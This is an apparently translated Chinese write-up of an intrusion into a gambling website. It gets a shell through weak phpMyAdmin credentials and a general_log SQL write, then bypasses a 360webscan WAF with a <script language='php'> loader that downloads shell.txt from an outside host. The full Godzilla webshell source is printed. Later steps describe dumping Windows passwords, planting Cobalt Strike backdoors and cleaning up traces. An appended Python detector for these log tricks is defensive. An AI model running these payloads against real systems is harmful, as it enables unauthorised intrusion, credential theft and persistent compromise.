
Title: Simply bypass waf to get the gambling website


Determine the target


Collect information

Starting from x.x.x.x, the regular test methods were all applied: directory scanning, port scanning, JS files, middleware, fingerprint recognition. In any case, all of them should be run.

Appending an arbitrary path produces an error. When I saw this page, a thought instantly came to me.


Why do I say that? Because I have encountered such a website before that reports this error. This is a PHP integrated environment called upupw, which is similar to phpstudy.

upupw -- pmd

phpstudy -- phpmyadmin

Breakthrough Point

This integrated environment package also has a phpinfo page, which links to the database management interface:

u.php

Test the weak password

root/root

After the connection succeeds, you can see the phpinfo page.

OK, now the problem becomes: phpmyadmin getshell.

getshell

Three steps to get the shell

```sql
set global general_log='on';
SET global general_log_file='D:/xxxx/WWW/cmd.php';
SELECT '<?php assert($_POST['cmd']);';
```

The page hung while the third step was executing. No response. I instantly felt something was wrong; there might be a WAF.

Tried switching to an AV-evading webshell, writing it into a txt first to see whether that succeeds.

No problem, so write the php file directly.

The shell can be written and connected to directly.

Sure enough, there is a WAF. I could feel it while writing it: the shell kept getting killed, and the SQL statement could not be executed.

Bypass waf

I didn't know what on earth the WAF was, so I tried downloading the file remotely.

To avoid the WAF intercepting PHP code, the script I downloaded remotely here uses JavaScript syntax to write PHP.

```sql
SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';
SELECT '<script language='php'> $a='http://x.x.x.x:81/shell.txt';$b='file'.'_g'.'et_'.'contents';$b=$b($a);file_put_contents('shell.php',$b); </script>'
```

Visiting 11.php will generate shell.php

The shell here also uses Godzilla's AV-evading shell:

```php
<?php
session_start();
@set_time_limit(0);
@error_reporting(0);
// XOR with the 16-byte key; '<' in the loop condition and '&' in the index
// mask were lost in extraction and are restored here.
function E($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $D[$i]=$D[$i]^$K[$i+1&15];
    }
    return $D;
}
function Q($D){
    return base64_encode($D);
}
function O($D){
    return base64_decode($D);
}
$P='pass';
$V='payload';
$T='3c6e0b8a9c15224a';
if (isset($_POST[$P])){
    $F=O(E(O($_POST[$P]),$T));
    if (isset($_SESSION[$V])){
        // Later requests: evaluate the payload stored in the session.
        $L=$_SESSION[$V];
        $A=explode('|',$L);
        class C{public function nvoke($p) {eval($p.'');}}
        $R=new C();
        $R->nvoke($A[0]);
        // Response is framed by the two halves of md5($P.$T).
        echo substr(md5($P.$T),0,16);
        echo Q(E(@run($F),$T));
        echo substr(md5($P.$T),16);
    }else{
        // First request: stash the decoded payload in the session.
        $_SESSION[$V]=$F;
    }
}
```

Tried so many times.

There is no WAF process in the process list.

The permission is SYSTEM.

Dissource code

Upload a password-grabbing tool, obtain the administrator password directly, and log on to the server.

Leave the back door and clean up the traces

Leave a few more backdoors, in case some of them are deleted.

There are so many machines in this network segment.

Source Code

Opening the source code reveals that the WAF is 360webscan.

Summary:

1. Information collection: directory scanning, port scanning, JS sensitive-file scanning, middleware scanning and fingerprint recognition turned up no usable information.
2. By appending a wrong path after the URL, the error message "To find, Fahai doesn't understand love, the page cannot be displayed" shows that the system is the PHP integrated environment upupw.
3. In this environment the phpinfo file is u.php. Entering the weak password root/root gets you straight into phpmyadmin, and the phpinfo information can be viewed at the same time. The website's absolute path is exposed as D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/
4. phpmyadmin getshell:

```sql
set global general_log='on';
SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/cmd.php';
SELECT '<?php assert($_POST['cmd']);';
```

5. A one-liner can be written directly, but connecting to the shell is intercepted by the WAF.
6. The remotely downloaded script uses JavaScript syntax to write PHP and bypasses the WAF (360webscan):

```sql
SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/11.php';
SELECT '<script language='php'> $a='http://x.x.x.x:81/shell.txt';$b='file'.'_g'.'et_'.'contents';$b=$b($a);file_put_contents('shell.php',$b); </script>'
```

7. Accessing 11.php generates shell.php; shell.txt is the Godzilla shell listed above.
8. Connect to the shell through Godzilla, then check the processes with tasklist: there is no antivirus software. Check the permission with whoami: it is SYSTEM.
9. Upload a hash-grabbing tool for local passwords, which can dump the Windows local usernames and passwords.
10. Upload the backdoor file generated by CS and execute it.
11. Download the source code and find that the WAF is 360webscan. Original link: https://xz.aliyun.com/t/9181
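A defender-side check for the two tricks in this write-up, added here as an example that is not part of the original post: it scans MySQL general-log lines for general_log_file being pointed at a script file under a web root, and for PHP wrapped in the legacy <script language="php"> tag that slips past '<?php' signatures. The sample log lines and the web-root directory names are constructed.

```python
import re

# Constructed sample in MySQL general-log layout: time, thread id + command, argument (tab-separated).
SAMPLE_LOG = [
    "2021-12-27T13:33:29Z\t 12 Query\tSELECT id, balance FROM players WHERE id = 42",
    "2021-12-27T13:33:30Z\t 12 Query\tSET GLOBAL general_log='ON'",
    "2021-12-27T13:33:31Z\t 12 Query\tSET GLOBAL general_log_file='D:/site/htdocs/cmd.php'",
    "2021-12-27T13:33:32Z\t 12 Query\tSELECT \"<script language='php'> phpinfo(); </script>\"",
    "2021-12-27T13:33:33Z\t 12 Query\tSET GLOBAL general_log_file='/var/log/mysql/query.log'",
]

# Assumed web-served directory names; a real deployment would take these from the server config.
WEB_ROOTS = ("/htdocs/", "/www/", "/wwwroot/")
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp)$", re.I)
LOG_FILE_SET = re.compile(r"set\s+(?:global\s+)?general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Legacy <script language="php"> open tag: old PHP executes it, but '<?php' signatures miss it.
SCRIPT_TAG = re.compile(r"<script\s+language\s*=\s*['\"]?php['\"]?\s*>", re.I)
PHP_OPEN = re.compile(r"<\?php\b|<\?=", re.I)

def check_query(query):
    """Return findings for one SQL statement (empty list when nothing is suspicious)."""
    findings = []
    m = LOG_FILE_SET.search(query)
    if m:
        path = m.group(1).replace("\\", "/").lower()
        # Log redirected into a web root with a script extension: every logged query becomes served code.
        if SCRIPT_EXT.search(path) and any(root in path for root in WEB_ROOTS):
            findings.append("general_log_file redirected into web root: " + m.group(1))
    if SCRIPT_TAG.search(query):
        findings.append("legacy <script language=php> tag inside SQL literal")
    if PHP_OPEN.search(query):
        findings.append("PHP open tag inside SQL literal")
    return findings

def scan_log(lines):
    """Scan general-log lines; return [(line_no, findings)] for lines that triggered a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        # The SQL text is the last tab-separated field; lines without tabs are treated as raw SQL.
        query = line.rsplit("\t", 1)[-1]
        found = check_query(query)
        if found:
            hits.append((n, found))
    return hits

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(n, "; ".join(found))
```

On the sample above only lines 3 and 4 fire; the benign relocation of the log to /var/log does not.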
